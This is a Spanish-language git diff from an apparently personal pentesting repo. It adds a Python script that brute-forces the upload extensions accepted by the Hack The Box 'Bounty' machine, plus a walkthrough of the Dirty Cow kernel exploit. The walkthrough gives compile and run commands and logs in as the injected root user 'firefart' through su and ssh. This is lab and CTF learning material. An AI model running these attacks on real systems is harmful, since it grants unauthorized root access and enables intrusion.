pages-themes · F1r0x · Aug 26, 2022 · Aug 26, 2022 · Aug 26, 2022 · Aug 26, 2022
diff --git a/Exploits/BountyHTBnumerationExtension/BountyNumExtensionHTB.py b/Exploits/BountyHTBnumerationExtension/BountyNumExtensionHTB.py
@@ -0,0 +1,50 @@
+#!/usr/bin/python3
+
+from pwn import *
+import signal, time, pdb, sys, requests
+
+def def_handler(sig, frame):
+    print("\n\n[!] Saliendo...\n")
+    sys.exit(1)
+
+# Ctrl + C
+signal.signal(signal.SIGINT, def_handler)
+
+# Variabls globales
+transfer_url = "http://10.10.10.93/transfer.aspx"  # Ip de la máquina 
+burp = {'http': 'http://127.0.0.1.:8080'}          # Conexión con Burbsuite   
+
+def uploadFile(extension):
+
+    s = requests.session()
+    r = s.get(transfer_url)
+
+    viewState = re.findall(r'id="__VIEWSTATE" value="(.*?)"', r.text)[0]
+    eventValidation = re.findall(r'id="__EVENTVALIDATION" value="(.*?)"', r.text)[0]
+
+    post_data = {
+         '__VIEWSTATE': viewState,
+         '__EVENTVALIDATION': eventValidation,
+         'btnUpload': 'Upload'
+    }
+
+    fileUploaded = {'FileUpload1': ('Prueba%s' % extension, 'Esto es una prueba')}
+
+    r = s.post(transfer_url, data=post_data, files=fileUploaded)    # Para añadir conexión con Burpsuite incluir ", proxies=burp" 
+
+    if "Invalid File. Please try again" not in r.text:
+        log.info("La extensión %s es valida" % extension)
+
+if __name__ == '__main__':
+
+    f = open("/usr/share/seclists/Discovery/Web-Content/raft-medium-extensions.txt","rb")
+
+    p1 = log.progress("Fuerza bruta")
+    p1.status("Iniciando ataque de fuerza bruta")
+
+    for extension in f.readlines():
+        extension = extension.decode().strip()
+        p1.status("Probando con la extensión %s" % extension)
+        uploadFile(extension)
+
+    uploadFile()
diff --git a/Exploits/BountyHTBnumerationExtension/Readme.md b/Exploits/BountyHTBnumerationExtension/Readme.md
@@ -0,0 +1,7 @@
+# HTB Bounty - Numeracion de extensiones.
+
+Este exploit se utiliza para numerar las extensiones que interpreta un sistema. El programa este ha sido crado para
+la máquina Bounty de Hack The Box. Usando un diccionario de extensiones las comprueba todas reportándonos cuáles
+podemos utilizar.
+
+![Captura de pantalla 2022-08-05 021242](https://user-images.githubusercontent.com/103068924/182975843-e3b63a68-bbaf-42bc-9ef1-6e16616f740a.png)
diff --git a/Exploits/DirtyCow/DirtyCow.md b/Exploits/DirtyCow/DirtyCow.md
@@ -0,0 +1,151 @@
+# Dirty Cow - EDB-ID:40839
+
+
+* <a href="#item1" style="text-decoration:none">¿Qué es Dirty Cow?</a>
+* <a href="#item2" style="text-decoration:none">¿Cómo explotar la vulnerabilidad Dirty Cow?</a>
+* <a href="#item3" style="text-decoration:none">Como saber que un equipo posee la vulnerabilidad Dirty Cow.</a>
+* <a href="#item4" style="text-decoration:none">Instalación del Exploit.</a>
+* <a href="#item5" style="text-decoration:none">Ejecución del Exploit.</a>
+
+
+<a name="item1"></a>
+## ¿Qué es Dirty Cow?
+
+
+Dirty Cow (Dirty copy-on-write) es una vulnerabilidad de seguridad informática para el kernel de Linux que afectó a todos los 
+sistemas operativos basados en Linux, incluidos los dispositivos Android, que usaban versiones anteriores del kernel de Linux 
+creadas antes de 2018.
+
+
+Concretamente, afecta a las versiones desde la 2.6.22 hasta la 3.9 del kernel de Linux.
+
+
+<a name="item2"></a>
+## ¿Cómo explotar la vulnerabilidad Dirty Cow?
+
+
+Este exploit escrito en `C`, utiliza el exploit `pokemon` de la vulnerabilidad Dirty Cow.
+
+
+El exploit aprovecha una vulnerabilidad en el código del kernel de Linux a través del cual genera automáticamente una nueva línea `passwd`(/etc/passdw). 
+
+
+Se le pedirá al usuario la nueva contraseña cuando se ejecute el binario. 
+
+
+A continuación, se realiza una copia de seguridad del archivo `/etc/passwd` original en `/tmp/passwd.bak` y sobrescribe la cuenta raíz con la
+línea generada. Esto podemos comprobarlo haciendo un `cat` en el archivo `passwd`:
+
+
+    cat /etc/passwd
+
+![Captura de pantalla 2022-08-04 031357](https://user-images.githubusercontent.com/103068924/182746135-250eed29-7793-471c-b274-043ae2f88f84.png)
+
+
+Después de ejecutar el exploit, debería poder iniciar sesión con el usuario recién originado. Por defecto se creará el Usurio `firefart`. Podemos
+cambiar el nombre dentro del exploit y proporcionarle el que queramos.
+
+
+![Captura de pantalla 2022-08-04 031524](https://user-images.githubusercontent.com/103068924/182746181-88bf1e37-8627-4a38-89b1-373d990b9a76.png)
+
+
+![Captura de pantalla 2022-08-04 031701](https://user-images.githubusercontent.com/103068924/182746205-34d43fb9-5c48-4270-b1ac-3a9d121d9950.png)
+
+
+Exploit original: https://www.exploit-db.com/exploits/40839
+
+
+Exploit en mi repositorio GitHub: https://github.com/F1r0x/f1r0x.github.io/blob/main/Exploits/DirtyCow/dirty.c
+
+
+<a name="item3"></a>
+## Como saber que un equipo posee la vulnerabilidad Dirty Cow:
+
+
+Básicamente, para comprobar si un sistema Linux es vulnerable al Dirty Cow es revisando la versión del kernel. Si la versión del kernel está entre
+la 2.6.22 hasta la 3.9 es muy posible que sea vulnerable. Para comprobar la versión del kernel podemos utilizar el comando:
+
+
+    uname -a
+
+![Captura de pantalla 2022-08-04 034452](https://user-images.githubusercontent.com/103068924/182746307-77b0b46f-f8d8-4e39-aed7-209f7b32bb63.png)
+
+
+<a name="item4"></a>
+## Instalación del exploit:
+
+
+Para instalar el exploit, primero debemos tener acceso al sistema y poder descargar el binario en el equipo víctima, podemos descargarlo desde 
+el repositorio original o desde GitHub si nos permite realizar un `git clone` o podemos copiarlo directamente desde el buscador y crear el
+archivo (mediante `nano` por ejemplo).
+
+
+* <a href="./dirty.c" style="text-decoration:none">Copiar de Aquí.</a>
+
+
+Podemos crear el archivo `dirty.c` utilizado `nano` y pegar el código del exploit.
+
+
+Una vez descargado o creado lo debemos compilar con: 
+
+
+    gcc -pthread dirty.c -o dirty -lcrypt 
+
+![Captura de pantalla 2022-08-04 031828](https://user-images.githubusercontent.com/103068924/182746374-e0239b7d-abe1-488e-a469-f67706a5317c.png)
+
+
+<a name="item5"></a>
+## Ejecución del Exploit:    
+
+
+Ahora para ejecutar el binario utilizamos el siguiente comando:
+
+
+    ./dirty
+
+ ![Captura de pantalla 2022-08-04 031905](https://user-images.githubusercontent.com/103068924/182746270-b2880a65-5126-47c8-8aea-48ab48177e8c.png)   
+
+ Tras ejecutarlo nos pedirá que ingresemos una nueva contraseña.    
+
+ Finalmente, una vez generada la nueva contraseña, se alojará el nuevo usuario en el `/etc/passwd`  y podremos ingresar como ese usuario
+ el cual tendrá privilegios de superusuario o `root`.
+
+ Para acceder al usuario:
+
+     su firefart
+
+ * `firefart`: Es el usuario predeterminado del exploit.    
+
+ Para acceder a través de un servicio `ssh`:    
+
+     ssh firefart@[Ip Vícitma]
+
+
+---
+---
+
+
+<html lang="en">
+<head>
+
+</head>
+<body>
+
+
+<script src="https://utteranc.es/client.js"
+    repo="F1r0x/gestion-comentarios"
+    issue-term="pathname"
+    theme="github-light"
+    crossorigin="anonymous"
+    async>
+</script>
+
+
+  </body>
+</html>
+
+
+---
+---
+
+